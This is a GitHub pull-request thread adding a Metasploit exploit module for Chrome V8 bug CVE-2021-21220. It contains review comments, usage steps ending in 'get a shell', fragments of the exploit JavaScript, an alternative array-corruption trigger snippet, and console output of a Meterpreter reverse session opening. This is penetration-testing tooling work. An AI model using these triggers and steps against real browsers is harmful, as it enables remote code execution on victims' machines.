Create Module for CVE-2021-21220 - Chrome V8 XOR Typer Mismatch Out-Of-Bounds Access Remote Code Execution
rapid7/metasploit-framework pull request #15105
Opened 2021-04-27 18:35 UTC by gwillcox-r7

This adds in an exploit module for CVE-2021-21220, a Chrome V8 XOR typer OOB Access RCE that was found in the 2021 Pwn2Own competition by Dataflow Security's Niklas Baumstark (@_niklasb) and Bruno Keith (@bkth_).

This module is based entirely off of the PoC from @r4j0x00 that he posted online at https://github.com/r4j0x00/exploits/tree/master/chrome-0day. I simply ported over the work using one of the previous modules that he submitted to Metasploit and made a few minor adjustments to the JavaScript code to get things working.

Note that this module will require you to run Chrome without the sandbox enabled as it does not come with a sandbox escape. Feel free to submit a PR if you do happen to combine this with a sandbox escape and would like to update this module though, however this is not the goal of this PR, which serves mainly to update the Chrome exploits and allow users to test out the work from @r4j0x00 using Metasploit payloads.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/multi/browser/chrome_cve_2021_21220_v8_insufficient_validation`
- [ ] `set TARGET *target number from list, with 0 being Linux, 1 being Windows, and 2 being MacOS*`
- [ ] `set PAYLOAD *payload you would like to run*`
- [ ] `set LHOST` and `set RHOST` as needed, plus any additional payload specific options.
- [ ] `exploit`
- [ ] On the target, run the vulnerable Chrome version without the sandbox by using the `--no-sandbox` flag on the command line. This might look something like `C:\Users\test\AppData\Local\Chromium\Application\chrome.exe --no-sandbox`.
- [ ] The output of running `exploit` should have provided a link for where to browse to trigger the exploit. Load this up in Chrome.
- [ ] Confirm that you get a shell on the target system.

2021-04-29 11:47 UTC, timwr commented on modules/exploits/multi/browser/chrome_cve_2021_21220_v8_insufficient_validation.rb
> +        if(x==-1) x = 0;
Nice work.
I think another exploitable bug that works in a similar same way (e.g produces a corrupted array) is simply:
```
      function foo(a) {
        let x = -1;
        if (!a) {
          x = 0xFFFFFFFF;
        }
        x = Math.max(0, x, -1);
        let z = 0 - x;
        var arr = new Array(z);
        arr.shift();
        var cor = [1.1, 1.2, 1.3];
...
```
I suspect this entire technique was killed in Chrome 90 though? 
@niklasb @bkth @r4j0x00

2021-04-29 11:51 UTC, timwr requested changes
Only minor changes, excellent work @gwillcox-r7

2021-04-29 11:51 UTC, timwr commented on modules/exploits/multi/browser/chrome_cve_2021_21220_v8_insufficient_validation.rb
> +      var f = wasm_instance.exports.main;
Perhaps rename f to wasm_func?

2021-04-29 11:51 UTC, timwr commented on modules/exploits/multi/browser/chrome_cve_2021_21220_v8_insufficient_validation.rb
> +          var x = 1;
Indentation :trollface:

2021-04-29 11:51 UTC, timwr commented on modules/exploits/multi/browser/chrome_cve_2021_21220_v8_insufficient_validation.rb
> +      function foo(a) {
Does the exploit still work with the argument `a` removed? It's not used

2021-04-29 11:51 UTC, timwr commented on modules/exploits/multi/browser/chrome_cve_2021_21220_v8_insufficient_validation.rb
> +        x -= 2147483647;
x -= 0x7FFFFFFF; might be more readable :trollface:

2021-04-29 11:51 UTC, timwr commented on modules/exploits/multi/browser/chrome_cve_2021_21220_v8_insufficient_validation.rb
> +      var arr2 = [itof(float_array_map), 1.2, 2.3, 3.4];
Pedantic, but surely `itof(ftoi(cor[3]))` is just `cor[3]`, perhaps `float_array_map` can be removed?

2021-04-29 11:53 UTC, niklasb commented on modules/exploits/multi/browser/chrome_cve_2021_21220_v8_insufficient_validation.rb
> +        if(x==-1) x = 0;
yes, it will die once https://github.com/v8/v8/commit/d4aafa4022b718596b3deadcc3cdcb9209896154 hits stable

2021-04-29 11:57 UTC, timwr requested changes
Typos

2021-04-29 11:57 UTC, timwr commented on documentation/modules/exploit/multi/browser/chrome_cve_2021_21220_v8_insufficient_validation.md
> +The exploit makes takes advantage of a lack of proper input validation in the V8 engine on x86_x64 builds
s/makes takes/takes

2021-04-29 11:57 UTC, timwr commented on documentation/modules/exploit/multi/browser/chrome_cve_2021_21220_v8_insufficient_validation.md
> +1. Do: `use exploit/multi/browser/chrome_simplifiedlowering_overflow`
s/chrome_simplified_lowering_overflow/chrome_cve_2021_21220_v8_insufficient_validation

2021-04-30 14:35 UTC, gwillcox-r7 commented on documentation/modules/exploit/multi/browser/chrome_cve_2021_21220_v8_insufficient_validation.md
> +1. Do: `use exploit/multi/browser/chrome_simplifiedlowering_overflow`
Ah thanks good spotting will get this resolved 👍

2021-04-30 14:42 UTC, gwillcox-r7 commented on modules/exploits/multi/browser/chrome_cve_2021_21220_v8_insufficient_validation.rb
> +      var f = wasm_instance.exports.main;
Thanks for these JavaScript updates, much appreciated! Will get these applied so long now 👍

2021-04-30 14:56 UTC, gwillcox-r7 commented on modules/exploits/multi/browser/chrome_cve_2021_21220_v8_insufficient_validation.rb
> +      var f = wasm_instance.exports.main;
Changed name to `wasm_main_func`

2021-04-30 15:07 UTC, gwillcox-r7 commented on modules/exploits/multi/browser/chrome_cve_2021_21220_v8_insufficient_validation.rb
> +        x -= 2147483647;
Agreed, will change this

2021-04-30 15:52 UTC, gwillcox-r7 commented on modules/exploits/multi/browser/chrome_cve_2021_21220_v8_insufficient_validation.rb
> +      function foo(a) {
Yep it works, and I've updated this to also update the calls that were passing `true` and `false` values to this function that weren't being used.

2021-04-30 15:53 UTC, gwillcox-r7 commented on modules/exploits/multi/browser/chrome_cve_2021_21220_v8_insufficient_validation.rb
> +      var arr2 = [itof(float_array_map), 1.2, 2.3, 3.4];
Yep your theory was correct. Replaced this with just `cor[3]` and removed the `float_array_map` variable and this works fine.

2021-04-30 15:53 UTC, gwillcox-r7 commented
Thanks for the feedback @timwr, uploading fixes now!

2021-04-30 21:36 UTC, timwr approved these changes

2021-04-30 21:57 UTC, merged

2021-04-30 22:04 UTC, timwr commented
Works on Chrome/90.0.4430.0, although sometimes it refreshes a few times:
```
msf6 exploit(multi/browser/chrome_cve_2021_21220_v8_insufficient_validation) >
[*] 192.168.13.117   chrome_cve_2021_21220_v8_insufficient_validation - Sending / to Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.0 Safari/537.36
[*] 192.168.13.117   chrome_cve_2021_21220_v8_insufficient_validation - Sending / to Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.0 Safari/537.36
[*] Sending stage (200262 bytes) to 192.168.13.117
[*] Meterpreter session 1 opened (192.168.13.37:4444 -> 192.168.13.117:49700) at 2021-04-30 23:02:12 +0100
```

2021-04-30 22:05 UTC, timwr commented
## Release notes

This adds in an exploit module for CVE-2021-21220, a Chrome V8 XOR typer OOB Access RCE that was found in the 2021 Pwn2Own competition by Dataflow Security's Niklas Baumstark (@niklasb) and Bruno Keith (@bkth).
Note that this module will require you to run Chrome without the sandbox enabled as it does not come with a sandbox escape.